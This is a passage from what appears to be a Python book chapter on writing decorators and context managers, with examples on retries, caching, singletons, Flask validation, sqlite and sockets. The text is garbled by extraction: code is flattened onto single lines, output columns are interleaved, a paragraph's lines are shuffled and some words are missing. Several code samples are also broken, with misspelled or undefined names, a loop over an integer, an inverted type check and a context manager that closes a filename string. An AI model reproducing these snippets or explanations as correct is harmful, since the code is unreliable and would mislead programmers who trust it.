The first technique is to create decorators that are a level deeper and have nested functions to introduce a novel model of indirection. Another technique would be to use a class for creating a decorator. Personally, I favor the second method, as it is clearer to understand and easy to visualize in terms of object-oriented programming. Imagine thinking in terms of multi-level nested functions on the other hand. We will be exploring both the approaches and you can decide which one suits your need most.

Let us take a decorator whose objective is to run a function multiple times. The parameter that we would need is the count of how many times we want to run the re-run function.

@rerun(count=5) def say_hello(text): print(f "Hello {text}")

>>> say_hello("FooBar") Hello FooBar

Hello Hello Hello Hello

FooBar FooBar FooBar FooBar

We have seen that a direct decorator call will simply replace the original function with the wrapped one. Therefore, when we parameterize the rerun decorator, we still have to maintain this property – it should return a function, which has wrapped the original one after processing the argument. Something like the following should work:

def rerun(count): def rerun_wrapper(function): # Add logic for the wrapper here return rerun_wrappers

In this case, there would be an extra function layer around the inner function. It is not as inception-like as it sounds. Let us dive a bit deeper: def rerun(count): def rerun_decorator(function): @functools.wraps(function) def rerun_wrapper(*args, **kwargs): for _ in range(count): reference = function(*args, **kwargs) return reference return rerun_wrapper return rerun_decorator

It is a similar implementation of decorators that we discussed in the previous sections, the only difference being an additional function to deal with the inputs to the decorator. The innermost function looks like the following: def rerun_wrapper(*args, **kwargs): for _ in range(count): reference = function(*args, **kwargs) return reference

This takes in any number of arguments and gives back the function value. It contains the logic of executing the original function multiple times using a loop. The next outer function is as follows:

def rerun_decorator(function): @functools.wraps(function) def rerun_wrapper(*args, **kwargs): … return rerun_wrapper

Look at the naming conventions – it is a personal opinion to name the function hierarchy this way, which has worked well over the years. We have a base name for the decorator for the outer most function. Then, within that is the decorator function whose name starts with the basename, and the innermost function is the wrapper function whose name also has the basename in it. This clearly demarcates the three levels.

The decorators without parameters can be used without the parenthesis. When you pass in the parameters, use them, else avoid.

Evaluation of multiple decorators

Multiple decorators can be applied to a function or a class – the question that might arise in a developer’s mind is in which order are the decorators evaluated? What is the best way to sequence decorators?

Let us take an example where you want to add a salutation text before the name of a person. We will create a descriptor to do that: def salutation(function): def add_salutation_wrap(): salutation = function() return (" ".join([salutation, "Stephen Hawking!"])) return add_salutation_wrap

def change_case(function): def to_upper(): case_txt = function() if not isinstance(case_txt, str): raiseTypeError("Not a string type") return case_txt.upper() return to_upper

@change_case @salutation

def get_salutation(): return "Hello" >> get_salutation() HELLO STEPHEN HAWKING!

So you see, the order of execution of the decorators is from inner to outer, that is, from bottom to top. Else, in this example, the Hello would not have been in uppercase. We can also prove this by reversing the decorator order and seeing what happens:

@salutation @change_case def get_salutation(): return "Bye"

>> get_salutation() BYE Stephen Hawking!

The name is not converted to uppercase since it was inserted after the change_case decorator was executed.

Using functools library for decorators

When a decorator is created, what it essentially does under the hood is substitute a function with another modified function that usually adds to the behaviour:

from datetime import datetime def enable_logs(function): def enable_logs_wrapper(*args, **kwargs): print(function.__name__ + " was invoked at " + str(datetime.now())) return function(*args, **kwargs) return enable_logs_wrapper

@enable_logs def get_square(number): return number * number

>>> square = get_square(9) >>> print(get_square.__name__) enable_logs_wrapper

Voila! You see that the decorator we put in place has modified the name of the function in the reference. Therefore, under the hood, Python is executing the function when the get_square function is called.

Using decorators causes you to loose the meta-information about the entity like __doc__, __name__ among others. Use functools.wrap() to persist the data post decoration.

The wraps API in the functools library can deal with this issue. This method ensures that when wrapping the method, all the meta-information is copied over from the original entity to the wrapped entity before any modification takes place. An updated version of the preceding code is as follows:

from datetime import datetime from functools import wraps

def enable_logs(function): @wraps(function) #← use functools API to wrap def enable_logs_wrapper(*args, **kwargs): print(function.__name__ + " was invoked at " + datetime.now()) return function(*args, **kwargs) return enable_logs_wrapper @enable_logs def eval_expression(number): '''a computing function''' return number + number * number

# prints 'eval_expression' print(eval_expression.__name__) # prints 'a computing function' print(eval_expression.__doc__) So from the preceding example, it is evident that the wraps() method in the functools standard library helps in persisting the meta-information of the entity, which otherwise would have been lost with custom decorators. There is also a simple third-party library called decorator that houses useful functionality for a more robust definition and use of decorators.

from decorator import decorator @decorator def call_log(function, *args, **kwargs): kwords = '' for key in sorted(kwargs): kwords = ', '.join('%r: %r' % (key, kwargs[k]))

print("Function %s called! Arguments %s, {%s}" % (function.__name__, args, kwords)) return function(*args, **kwargs) @call_log def random_function(): pass >>> random_function() Function random_function called! Arguments (), {}

You see how the decorator class uncomplicates the creation of the decorators. A similar implementation will be needed for creating decorators for the class methods. Let us see that in action with the following small example:

import requests def try_again(times=3, pause=10): def retry(function): @wraps(function) def run_again(*args, **kwargs): for try_num in times: function(*args, **kwargs) time.sleep(pause) return run_again return retry class DownloadFromRemote: def __init__(self, remote_url, hdr_string): self.remote_url = remote_url self.hdr = hdr_string @try_again(times=4, pause=5) def request_file(self ): try: rsp = requests.get(self.remote_url, self.hdr) if rsp.status_code in (429, 500, 502, 503): continue

except Exception as err: raise FailedRequest("Server connection failed!") return rsp The preceding example is the custom implemented decorator for the class method. You can also create the same decorator using the decorator library. Try it yourself.

Stateful decorators

Decorators are useful tools if you want to maintain or track a state across different function calls. Let us see how we can keep track of the number of times a function was invoked using a decorator:

import functools def invoke_count(function): @functools.wraps(function) def calls_wrapper(*args, **kwargs): calls_wrapper.count_of_calls += 1 print (f "CallNo.{calls_wrapper.count_of_calls}") return function(*args, **kwargs) calls_wrapper.count_of_calls = 0 return calls_wrapper

@invoke_count def hello_world(): print("Hello to you, too!")

In this case, the count of the calls is the state of the function that needed to be maintained, and is stored in the attribute of the decorator. The following is what it results in:

>>> hello_world()

Call No. 1 Hello to you, too!

>>> hello_world() Call No. 2 Hello to you, too!

>>> hello_world.count_of_calls 2

Similar implementations could be made for other sophisticated state management in classes and functions.

Creating singletons with décorators

Singleton classes have one instance persisted and no more can be created at a time. Python makes use of Singletons with the likes of True, False, and None, which are extensively used in your code, without you even thinking they are singletons.

if _method is None: return some_decorator else: return some_decorator(_method)

In the preceding example, is based comparison results in True when the instances are the same instance. Let us define a decorator that can ensure that any class wrapped in it will be instantiated only once, and every other time it is instantiated, the first instance that was persisted is returned.

import functools

def make_singleton(cls): @functools.wraps(cls) def sgl_wrapper(*args, **kwargs): if not sgl_wrapper.object: sgl_wrapper.object = cls(*args, **kwargs) return sgl_wrapper.object

sgl_wrapper.object = None return sgl_wrapper

@make_singleton class DeltaStategies: # Some Logic Pass

Decorators for classes and functions are created in the same way. Conventionally, to differentiate between them, we use the cls or func'/'function variable name as the wrapper input. Let us execute the preceding class with the decorator:

>>> strat_one = DeltaStategies() >>> strat_two = DeltaStategies()

>>> id(strat_one) 123872387888837

>>> id(strat_two) 123872387888837 >>> strat_one is strat_two True The is keyword justifies that both the objects refer to the same instance and the second call did not create a new one.

Singleton classes are not really used as often in Python as in other languages. The effect of a Singleton is usually better implemented as a global variable in a module.

Caching function return values – memoisation

When we are writing APIs that query and fetch data from some location, sometimes overlapping requests can unnecessarily increase the runtime of the functions. An accepted way of handling such queries optimally is to cache the results in a smart manner. This is referred to as memorization. Let us see a simple example of getting the nth Fibonacci series entry to see how this can be used. Assume that we have written a modified version of the rerun decorator from previous sections and have a count_calls decorator which adds a num_calls property to the entity:

@count_calls def get_fibo_seies(start_int): if start_int< 2: return start_int return get_fibo_series(start_int - 1) + get_fibo_series(start_int - 2)

If we look at how this performs on execution, the following is how it goes:

>>> get_fibo_series(10) 55

>>> get_fibo_series.num_calls 177

The code works, but it is terrible in performance. While computing the 10th Fibonacci number in the series, you need to know only the previous 9 numbers. However, this code keeps recalculating the previous numbers for the number computed. That results in 177 calls for the 10th number. If you keep going, you will notice that it increases exponentially – about 22000 computations for the 20th value and about 2.7 million for the 30th number. This is grossly sub-optimal in performance, and warrants a case of storing the intermediate information, rather than re-generating. The following is an approach for using a lookup table as a cache:

import functools from decorators import count_calls

def enable_caching(function): @functools.wraps(function) def wrapper(*args, **kwargs): key_for_cache = args + tuple(kwargs.items()) if key_for_cache not in wrapper.cache: wrapper.cache[key_for_cache] = function(*args, **kwargs) return wrapper.cache[key_for_cache] wrapper.cache = dict() return wrapper

@enable_caching @count_calls def get_fibo_series(start_int):

if start_int< 2: return start_int return get_fibo_series(start_int - 1) + get_fibo_series(start_int - 2) The enable_caching decorator now has a member called cache that will store the result of every function call. This acts as a lookup table and will return a pre-computed value, if the function has been called for that set of arguments. >>> get_fibo_series(10) Call 1 of 'get_fibo_series'

… Call 11 of 'get_fibo_series' 55 >>> get_fibo_series(7) 13 The second call in the preceding example to find the seventh number in the series did not execute the function even once. This is from the fact that the value of the function call for seven as the argument is already persisted in the cache.

Be mindful of the fact that the uncensored used of caching in production applications can lead to memory starvation issues.

Similar to the caching class that we created, Python does have a predefined decorator in the functools library called the which does the same job, but also gives you an option to specify in the argument, which level of the cache should it be applied to, among other features. You can use this for the simple use cases, instead of spending time in defining your own. import functools @functools.lru_cache(maxsize=5) def get_fibo_series(start_int): print(f "Getting{start_int}th value") if start_int< 2: return start_int return get_fibo_series(start_int - 1) + \ get_fibo_series(start_int - 2)

The argument maxsize specifies how many calls should be stored in the lookup table. If you do not specify anything, it will store up to a depth of 128 by default. This is to avoid memory overflow. For no caching, you can pass to disable the effect. Let’s take a look at how this performs when executed: >>> get_fibo_series(10) Getting 10th value Getting 9th value Getting 8th value

Getting Getting Getting Getting

7th 6th 5th 4th

value value value value

Getting Getting Getting Getting

3th 2th 1th 0th

value value value value

55 >>> get_fibo_series(7) 13 >>> get_fibo_series(5) Getting Getting Getting Getting

5th 4th 3th 2th

value value value value

Getting 1th value Getting 0th value 5 >>> get_fibo_series(7) Getting 7th value Getting 6th value 13 >>> get_fibo_series(5) 5

>>> get_fibo_series.cache_info() CacheInfo(hits=16, misses=19, maxsize=5, currsize=5) The cache performance can be assessed with the help of the .cache_info() function which can be invoked using the function that was decorated with the and optimize it if required.

Using decorators for tracing code

More often than not, you want to profile different sections of the code in production. The different scenarios where metric tracing with decorators could be helpful include the following:

Use custom logging to trace the flow of control in the function; for example, printing out the lines being executed in sequence. Track the system resource consumption in runtime; for example, the CPU cores being utilized and the memory being used.

Track the execution time of the methods, for latency monitoring or tests for performance.

Track the sequence of function calls and supplied parameters for every execution.

Writing effective decorators

While decorators are a great feature of Python, they are not exempt from issues if used incorrectly. In this section, we will see some common issues to keep in mind or avoid for creating effective decorators, and will look at some uncommon use cases for the same.

Preserving data about the original wrapped object

An issue encountered while applying decorators would be that we do not maintain the attributes or the properties of the function that was originally wrapped. This can lead to several unintended side effects that are difficult to track. Let us take the following simple logging function to illustrate this:

# wrap_decor.py def log_tracer(func): def myWrapper(*args, **kwargs): logger.info("running %s", func.__qualname__) return func(*args, **kwargs) return myWrapper

Take the following client function that applies this decorator:

@log_tracer def data_proc(key_info): logger.info("processing key %s", key_info) …

Has something changed in the wrapped function due to the decorator? The answer, in this case, is yes. Decorators, by principle, should not be changing any aspect of the original function that it is wrapping. What happens here is that we have created a ‘wrapped’ method in our decorator, and when it is

executed, the name, docstring, and other properties of the original function is modified to the wrapped function.

>>> help(data_proc) Help on function wrapped in module wrap_decor: wrapped(*args, **kwargs)

And the way in which it is called can be seen in its qualified name:

>>> data_proc.__qualname__ 'wrap_decor..wrapped' Now, say that the decorator is used in several places in the code; this will create an army of wrapped methods in the code, which will create a debugging nightmare for the firm. Since the docstrings of the function are overridden, if, like me, you are used to writing test cases in them, then they would never be run as the docstring already overridden. Now, in order to fix this issue, all we have to do is explicitly let the wrapped function to wrap the function with the help of another decorator. # wrap_decor_2.py def log_tracer(func): @wraps(func) def wrapped(*args, **kwargs): logger.info("running %s", func.__qualname__)

return func(*args, **kwargs) return wrapped >>> help(data_proc) Help on function data_proc in module wrap_decor_2: data_proc(key_info) >>> data_proc.__qualname__ 'data_proc'

Another import aspect is that now we should be able to see and run the doctring tests that we had defined. The wrap decorator, with the help of the __wrapped__ attribute, will also provide access to the underlying original function. This lesser known feature is not meant for a production application, but definitely helps in the test suites that need to be set up around the original function.

Use functools.wraps decorator over the wrapped function, when creating a decorator to avoid overridden names.

Handling decorator side-effects

Let us consider a decorator entity that was setup to log the beginning of the execution of a function, and capture how long it took the function to run:

def func_trace_wrong(method): logger.info("Execute method %s", function) exec_begin_time = time.time() @functools.wraps(method) def wrapped(*args, **kwargs): output = function(*args, **kwargs) logger.info( "methodtakes %.2fs", time.time() –exec_begin_time ) return output return wrapped

We now apply this to a function and see what the expected output would be: @func_trace_wrong def slowdown(callback, time_secs=0): time.sleep(time_secs) return callback()

What was missed was a minor bug in the code. Let us see if we can figure out what the bug was by running a few statements:

>>> from decorator_module import slowdown INFO:Execute method slowdown at 0x…>

Import should just be loading the module, not executing it. Hence, the log line here is an error. Let us execute the method on the terminal and see the results:

>>> main() … INFO:method takes 8.57s

>>> main() … INFO:method takes 12.98s >>> main() … INFO:method takes took 16.92s Ideally, if you run the same code several times, you should see the same results. However, in this case, every subsequent run takes a little more time. Weird, right? Let us investigate further. The decorator, by definition, does the following:

slowdown = func_trace_wrong(slowdown)

Now, this also is executed when the import operation takes place. Every successive call also finds the difference from current time to the import time and not the run start. This can be simply fixed by rearranging the code:

def func_trace(method): @functools.wraps(method) def wrapped(*args, **kwargs): logger.info("Execute method %s", method.__qualname__) exec_begin_time = time.time() output = method(*args, **kwargs) logger.info( "method %s takes %.2fs", method.__qualname__, time.time() - start_time )

return result return wrapped

This approach resolves the issues that we discussed in this section.

Advantages of decorators with side-effects

We talked about decorator’s side effects. Now, we will discuss the situations where these side effects can come handy – say, for example, the module needs to have the function to register the objects to a public registry. Let us take the case of an event systems which has a login capability for users. What if we want to make only some events available at the module level, and not all? We can design the classes in a way that the derived classes of the events are the ones we want to expose. One way would be to flag every class on whether they will be exposed, but a better idea would be to make use of decorators that will specifically register whether or not the class should be exposed. We define a class that contains all the user events that are defined:

EXPOSED_EVENT_SET = {}

def register_for_use(myEvent): EXPOSED_EVENT_SET[myEvent.__name__] = myEvent return myEvent

class Event: class customEvent: TYPE = "specificEvent"

@register_for_use class LoginUserHandler(customEvent):

""" Executed when user is logging in to the system """ pass

@register_for_use class LogoutEventHandler(customEvent): """Invoked when logout operation is initiated/completed """ pass

Whenever the module or any part of it is imported, the EXPOSED_EVENT_SET is populated since the decorator to register the class is invoked. >>> from test_effects import EXPOSED_EVENT_SET >>> EXPOSED_EVENT_SET {'LoginUserHandler': test_effects.LoginUserHandler, 'LogoutEventHandler': test_effects.LogoutEventHandler} In the preceding example, you will see that the code is not very clear, since the set of registered classes will only be computed and available when imported during runtime, and it is not easy to predict the values by reading through the code. However, sometimes, this is needed. Most of the Python web framework libraries make use of this construct heavily to make sure that certain objects are available. Ideally, as we discussed decorators should not be modifying the signature of the functions that they wrap. However, in certain situations, this anti-pattern can be used to develop a necessary feature, even though it is not Pythonic. Exercise caution.

Create decorators that work for multiple object types

Decorators are cool, we know now. However, sometimes decorators need to be versatile too. Sometimes, you need to use the same decorators for different types of objects in Python, be it a class, function, or statics.

In the course of development, we have a target object in mind, and the decorators are designed to work usually with that specific type. Such decorators might not seamlessly work out of the box for other object types. For instance, when we design a decorator to work on a method, it may not be compliant with a class.

Let us talk about how we can define generic decorators. The key lies in the way in which we deal with the parameters in the signature of the decorators. If we use *args and **kwargs in the decorator definition, it makes it generic and will now work for most situations. However, sometimes this may not be flexible. Instead, we could define the wrapper function of the decorator in accordance with the signature of the initial function. Some of the reasons for this could be as follows:

It is clearer as it is similar to the original function. Taking in all generic arguments with *args and **kwargs would be difficult to use at times, since you have no idea what will be passed.

Let us discuss a case where there are several functions in the code, each take in a parameter that is used to instantiate an object. In such cases, the duplicate code for doing this may be done away with by using a decorator that will manage the parameter.

In the following example, let us assume that the DatabaseAdapter object has the logic to establish a DB connection and execute transactions. However, it needs a parameter string to establish the connection. The sample functions here will have access to the DatabaseAdapter object and will receive a string parameter. The access to the DatabaseAdapter object is common here and can be part of the decorator. The functions can still process the parameter. import logging from functools import wraps # Logger instances logger = logging.getLogger(__name__) class DatabaseAdapter: def __init__(self, databaseParameters): self.databaseParameters= databaseParameters def run_query(self, query_string): return f "Running {query_string} with params {self.databaseParameters}"

# Define the decorator def use_database_driver(func): """ Creates and returns a driver object from the param string """ @wraps(func) def wrapped(databaseParameters): return func(DatabaseAdapter(databaseParameters)) return wrapped @use_database_driver def execute_query(db_driver): return db_driver.run_query("some_random_function")

If we pass the connection string as a parameter to the function, an object of DatabaseAdapter class is used to execute the query and return the results:

>>> execute_query("parameter_string") It works fine in the regular method. However, let us see what happens when we use the same decorator on a class method; would that work in the same way? class HandleDBStuff: @use_database_driver def execute_db_query(self, db_driver): return db_driver.run_query(self.__class__.__name__)

When you execute the function, you will see the following output: >>> HandleDBStuff().execute_db_query("Failing Test!") Traceback (most recent call last): … TypeError: wrapped() takes 1 positional argument but 2 were given You see the problem here? The class methods, as per their implementation, have an additional parameter, ‘self’ for accessing the state of the class as the initial parameter. Our decorator was not designed to handle this. It will try to identify the self as the databaseString parameter, and thereby throw on the second parameter. The fix for making our decorator handle these cases would be to implement it as a class and use the __get__ method.

from types import MethodType from functools import wraps class use_database_driver: """ Creates and returns a driver object from the

param string """ def __init__(self, func): self.func = func wraps(self.func)(self )

def __call__(self, connectionString): return self.func(DatabaseAdapter(connectionString))

def __get__(self, obj, owner): if obj is None: return self return self.__class__(MethodType(self.func, obj))

The preceding decorator implementation is now simply binding the function in consideration to the object, post which the decorator is re-created with the new updated callable. If you use this on a regular function, the __get__ method will not be invoked, hence satisfying both the cases.

Validating JSON data

Every developer has, at some point, dealt with parsing, generating, or writing JSON serialized data. My latest interaction while developing a route handler for a Flask application is as follows:

@app.route("/search", methods=["GET", "POST"]) def get_results(): json_payload = request.read_json_data() if "passkey" not in json_payload: abort(400)

# Database updation logic here return "Voila!"

In this, we are making sure that the passkey is present when the request is received. There are the following two problems here:

The get_results methods may not be the right place to house the validation logic.

You might need to use the validation in some other place in the code, maybe, other routes. This could be handled by creating a common decorator for the validation logic and using it whereever needed.

import functools from flask import Flask, abort, request

app = Flask(__name__)

def json_validation(*custom_args): # 1 def decor_json_validation(function): @functools.wraps(function) def json_validation_wrapper(*args, **kwargs): jsonObj = request.read_json_data() for custom_arg in custom_args: # 2 if custom_arg not in jsonObj:

abort(400) return function(*args, **kwargs) return json_validation_wrapper return décor_json_validation

The decorator defined in the preceding example takes in multiple arguments that will be keywords to lookup in the json request, and the validation is carried out. We can now configure the route handler to work to concentrate on the actual work of fetching the results, and can rely on the fact that the JSON data has been validated in this context. @app.route("/search", methods=["GET", "POST"]) @json_validation("passkey") def get_results():

json_payload = request.read_json_data() # Database updation logic here return "Voila!"

Control execution rate of code

Sometimes, we face the need different sections of our code use cases for when you want keep up with a queue that is

to control how fast or slow the should run. There can be several to make the program slow, let’s say, feeding the data.

Let’s create a decorator to handle the slowdown in its context with an argument specifying how much that rate should be: import time import functools

def reduce_execution_rate(_function=None, *, num_seconds=2): def decorator_exec_rate_reduction(function): @functools.wraps(function) def wrapper_rate_reduction(*args, **kwargs): time.sleep(num_seconds) return function(*args, **kwargs) return wrapper_rate_reduction

if _function is None: return decorator_exec_rate_reduction else: return decorator_exec_rate_reduction(_function)

The preceding code ensures that the decorator can be used both with and without the argument. If the preceding decorator is used on a recursive function, you will see the following effect in action:

@reduce_execution_rate(num_seconds=3) def clock_to_zero(start_integer): if start_integer< 1: print("Shoot!")

else: print(start_integer) clock_to_zero(start_integer - 1)

As earlier, you must run the example yourself to see the effect of the decorator:

>>> clock_to_zero(5) 5 4 3 2 1 Shoot!

Décorators and the DRY principle

better known as Don’t Repeat Yourself refers to the principle where the functionality is bundled into constructs that can be reused across the codebase in multiple objects. Decorators are one such example of constructs that aid the DRY principle. It promotes that certain logic should be registered only once in the library or software. Once defined, a decorator will mask the core logic, thereby enabling abstraction and encapsulation, while also reducing the number of lines of expected code in the places where they are used several times.

Decorators need to adhere to the DRY principle, whether they are used with functions or classes. They do away with the need to duplicate code, especially while overriding or re-implementing certain logic in the derived classes. In a professional setup, using the DRY compliant code helps to reduce the development lifecycle time and cost, as well as make things maintainable in the long run. When the logic to these units of tasks need to be changed, only one place needs to be updated. This is the beauty of reuse.

However, you also need to ensure that efforts and lines of code are saved while designing a decorator. Decorators add a new level of indirection for the code base, thereby the code becomes super complex. Even though they are supposed to be treated as black boxes, sometimes the folks would want to walk through the code to aid in the understanding or debugging, so the complexity of creating the decorator should be worth it. If you are not going to

use the code fragment multiple times, then better avoid it and choose a simple function or a small class.

Then the question arises, how much reuse is enough reuse? Are there any guidelines or rules that can tell you when you should and should not be thinking from a reusable perspective? Sadly, there is no such specification for Python decorators. However, from popular opinion and personal experience, the rule of thumb that I follow while deciding is that if a particular component is to be used at least three times in the code, then you should consider using the reusable constructs to redefine that object.

It is three times more complex to write reusable code constructs than duplicate code. Hence, the effort to identify where it is needed is worth it.

The moral of the story is that decorators are clean, powerful, and easy-to-use, and are big promoters of code reuse. However, the following guiding principles have to be taken into account before diving into them: Do not think of decorators from the beginning. Look for patterns in the design and implementation phase, and when you identify a viable task unit, go for a decorator.

Ensure that the decorator is mandated to be used in the client code (like the ones in Flask) or are used several times in the code. Only then, should you implement them.

The code in your decorators should be minimal, and should constitute only one task unit.

Separation of concerns in decorators

Decorators in Python are powerful tools that aid in the reuse of your code across a software system. One property of such code should be cohesiveness – which means that each entity should ideally perform only one task properly. The more scoped and focussed the task is, the more reusable it makes the component. This also makes them avoid coupling and dependencies on the client code. Let us see this practice with the help of an action: import functools … def func_trace(method): @functools.wraps(method) def wrapper(*args, **kwargs): logger.info("Method name %s executing", method.__qualname__) run_begin_time= time.time() output = method(*args, **kwargs) logger.info( "method %s takes %.2fs", method.__qualname__, time.time() – run_begin_time ) return output return wrapper

In this simple example, the decorator may work fine, but in doing more than one trivial tasks – it traces the execution and

computes the runtime. Therefore, if someone only wants one of these two functionalities, they would still be stuck with both of them.

Let’s see how we can break these into different smaller decorators that each define a unit level of responsibility, giving the freedom of choice to the end-user:

def exec_trace(method): @wraps(method) def myWrapper(*args, **kwargs): logger.info("Method name %s executing", method.__qualname__) return method(*kwargs, **kwargs) return myWrapper

def time_profiler(method): @wraps(method) def myWrapper(*args, **kwargs): run_begin = time.time() output = method(*args, **kwargs) logger.info("Method %s takes %.2f ", method.__qualname__, time.time() – run_begin) return output return myWrapper Now we can use both the decorators in a nested manner and achieve the same functionality as the example in the previous segment:

@time_profiler @exec_trace def operation(): # Add method logic here …

The order in which the decorators are supplied is also important – they are executed from inside out from the innermost decorator to the outmost. Also, only place a single unit of task in a decorator and have multiple ones, if needed.

An analysis of optimal decorators

Finally, let us summarize the guidelines on what makes an optimal decorator, and which popular Python libraries make heavy use of decorators. Optimal decorators should have the following traits:

Encapsulation: There has to be a clear demarcation of responsibilities between the tasks done by the decorator versus the functions or methods that it is decorating. Decorators are meant to be like black boxes for the users who should have no clue about how the logic is implemented in it. This is sometimes correctly referred to as a leaky abstraction.

Reusability: Make the decorators generic – in that way it can be applied to several different types, rather than only on one function. If that was true, you could have simply made that into a function, rather than a decorator.

Orthogonality: You should always decouple the decorator from the object that it is being used upon, thereby making the decorator independent. If you have used Celery, you would know that decorators are heavily used in their construct, for example, a task would be defined as follows:

@app.task def custom_task(): ….

Decorators like this are not just simple, but also very powerful. From the user’s standpoint, we simply ask them to create the function definition, while converting it into a task is automatically taken care of by the decorator. Several lines of convoluted code is wrapped in the decorator definition of the decorated function has nothing to do with it. This ensures a logical separation between the two, which is the perfect example of encapsulation, and the functionalities are separated. Most web frameworks in Python like Flask, django, pyramid, and so on, implement their view handlers and route definitions. An example from Flask is as follows:

@route("/", method=["POST", "GET"]) def handle_view(request): … Compared to the preceding, these decorators are providing argument-based additional functionality where the method defined in bound to a certain endpoint in the URL, and which fetch protocol (GET, POST, etc) should be used. This updates the signature of the original function to provide a simpler interface for use. These libraries of web frameworks expose their functionality to the end users with the help of decorators, and it is evident that these decorators are an excellent way of defining a clean programming interface.

Context managers

Context managers are another useful feature when it comes to writing safer Python code. You may already be using them for most trivial tasks with the built-in libraries like opening a file to read or write using the with keyword.

When you are writing the library methods or creating an API that the client will be using, context managers can help write simpler, more readable, and maintainable code.

Manage resources with context managers

We have been using the with keyword since we learnt how to open files in Python. Have we ever wondered how some objects support the use of with and some don’t? Take a look at the following sample implementation, so that we can build custom classes supporting context managers using

class LoadFile: def __init__ (self, filename): self.filename = filename

def __enter__ (self ): self.file_to_read = open(self.filename, 'w') return self

def __exit__ (self,exc_type,exc_val,exc_tb): if self.filename: self.filename.close()

with LoadFile(name) as fl: f.write("Some random data") The LoadFile class defined will now handle the file descriptor’s opening and closing process for you. When the interpreter enters the with block, the __enter__ function is called. When the block is executed and the control goes out of the context, the __exit__

method implemented is called to handle the resources being released.

Some of the salient features of context managers in Python are listed as follows:

__enter__ holds and returns a reference to the entity that is forming the context manager block – usually refers to self.

__exit__ invokes the parent context manager which is different from the one returned by the __enter__ function.

__enter__ is called as soon as the execution of the block in ‘with’ begins irrespective of the errors before.

However, the __exit__ method will not be called if an exception is thrown in the __init__ or __enter__ functions.

Another trick to be cautious about is that if the __exit__ method is made to return True, then the block will exit gracefully and exceptions, if any, are suppressed. We now illustrate the preceding with the help of an example of the context manager class

class CustomConMan(): def __init__(self ): print("Initiating Object Creation")

self.someData = 42

def __enter__(self ): print("Within the __enter__ block") return self def __exit__(self, data_type, data, data_traceback, exec_type=None): print('Within the __exit__ block') if exc_type: print(f "data_type: {data_type}") print(f "data: {data}") print(f "data_traceback: {data_traceback}")

In [3]: cntx = CustomConMan() Out[3]: Initiating Object Creation

In [4]: cntx.someData Out[4]: 42

In[5]: with cntx as cm: …      print("Within code block") Within the __enter__ block Within code block Within the __exit__ block

So, that is how we create a context manager class. However, Python can help you write context managers by using the contextlib class.

Using contextlib for creating context managers

The contextlib class in Python exposes an API in the form a decorator called contextmanager that helps to wrap a function as a context manager. This proves to be easier than writing a whole class for it or even implement the __enter__ and __exit__ functions. The decorator in contextlib is a generator based factory method for some resources that can be context managed using the ‘with’ statement. from contextlib import contextmanager

@contextmanager def file_dump(name_of_file): try: fl_handle = open(name_of_file, "w") yield fl_handle finally: fl_handle.close()

In[2]: with file_dump("time_series.txt") as fl: fl.write("Some random data!") The feature of the yield keyword in Python is that it returns a value when encountered, and then persists the state. When the control is returned, the code executes beyond the yield. The same thing happens here. When the file_dump method acquires the

resource, the yield gives the resource handler. When the context block is exited, the generator completes the remaining resource clean-up statement.

The @contextmanager decorator creates context managers with the yield keyword controlling the resource. It works as good as the custom class that we created in the previous section. Personally, I find the @contextmanager decorator to be cleaner in terms of code, but the class-based implementation is more extensive and clearer.

Some practical uses of context managers

Context Managers are the Pythonic way of managing resources. Let’s look at where the context manager can be useful in day-today programming and in your projects. There are many cases where you can use a context manager to make your code better, devoid of bugs and lags.

Let us explore a couple of different scenarios which context managers are best suited for. Besides these, you can use a context manager in many different feature implementations. For that, you need to find the opportunities in your code that you think would be better when written using a context manager.

Safe database access

Usually, we interact with databases, by opening a connection, executing the transactions and then closing the connection. We sometimes work on postgres; sometimes, explicitly handling the connections leaves us with buggy code and open database connections. This is where context managers come in.

The context managers ensure that when a transaction is in process for the database updation, the DB remains in a locked state. In addition, the connection remains open only for the duration of the update. An example with sqlite is as follows:

import sqlite3

connection = sqlite3.connect(":memory:") connection.execute("create table car (id integer primary key, number varchar unique)")

with connection: connection.execute("insert into car(number) values (?)", ("KA-4393",)) try: with connection: connection.execute("insert into car(number) values (?)", ("KA-4393",))

except sqlite3.IntegrityError: print("Unable to add the same entry twice.")

The connection.commit() is automatically invoked after the context manager exits. If an exception occurs, the connection.rollback() API is automatically triggered to reset the DB to the original state. However, you still have to explicitly raise and catch the Exception.

Writing tests

While writing tests, a lot of time you want to mock the specific services of tests with different kinds of exceptions thrown by the code. In these cases, a context manager is useful. Testing the libraries like pytest have features that allow you to use a context manager to write the code that tests those exception or mock the services.

import pytest def integer_division(self, num1, num2): if isinstance(num1, int) and isintance(num2, int): raiseValueError("Please enter integer values!") try: return num1/num2 except ZeroDevisionException: print("Denominator should not be Zero!") raise

with pytest.raises(ValueError): integer_division("21", 7) The mock library can also be used with context managers:

with mock.patch("my_class.my_function"): method_name()

The mock.patch() API is a good example of using context managers, which can also be used as a decorator!

Resource sharing in Python

The with statement can make context managers that control access to a resource. It ensures that only a single user has access to the resource at a time. Let us assume that we have a file that needs to be read by several processes. If each of these processes use the context manager, then only one at a time can access it and lock it in the interim. You would not have to worry about the concurrency issues here. from filelock import FileLock

def update_file_entry(staticticsFile): with FileLock(staticticsFile): # File is now locked for updation perform_operations()

The context manager creates the critical section for the code. While one process is entering and operating on this file, another process would not be able to in accordance with the filelock library here.

Remote connection protocol

Sockets are cool as a concept, but if they are not properly used, it can lead to loopholes and exposed bugs in the applications. The network level bugs are much more risky in a production setup and make the code vulnerable.

When a remote network connection to a resource is warranted, a context manager is the best bet for resource management. import socket

class NetworkResourceAccess: def __init__(self, hostname, access_port): self.hostname = hostname self.access_port = access_port

def __enter__(self ): self._remoteMachine = socket() self._remoteMachine.connect((self.hostname, self.access_port)) return self def __exit__(self, exception, return_code, traceback): self._remoteMachine.close()

def receive(self ): get_data_util()

def send(self, data): send_data_util(data)

with NetworkResourceAccess(hostname, access_port) as netgear: netgear.send(['entryData1', 'entryData2']) output = netgear.receive()

The context manager in the preceding snippet helps to establish a connection with the remote host, and handles several different quirks seamlessly for you.

Always think of context managers if the problem deals with resource management, excpetion handling in tests or database access. They make the API simpler, cleaner, and error free.

Conclusion

Hope that this was a long but interesting trail of learning. In this chapter, we covered some detailed, but essential ground about what decorators are, how to create them effectively for objects like functions, classes, or generators, and some principles and examples of writing effective decorators. Some salient lessons on Decorators that we learnt are as follows:

They are versatile and reusable in nature, thereby reducing the lines of code.

They decorate objects, and can take in arguments and return values.

Use of the @functools.wraps persists the meta-information for the original wrapped function.

Decorators can be applied to classes, generators, and can be stacked.

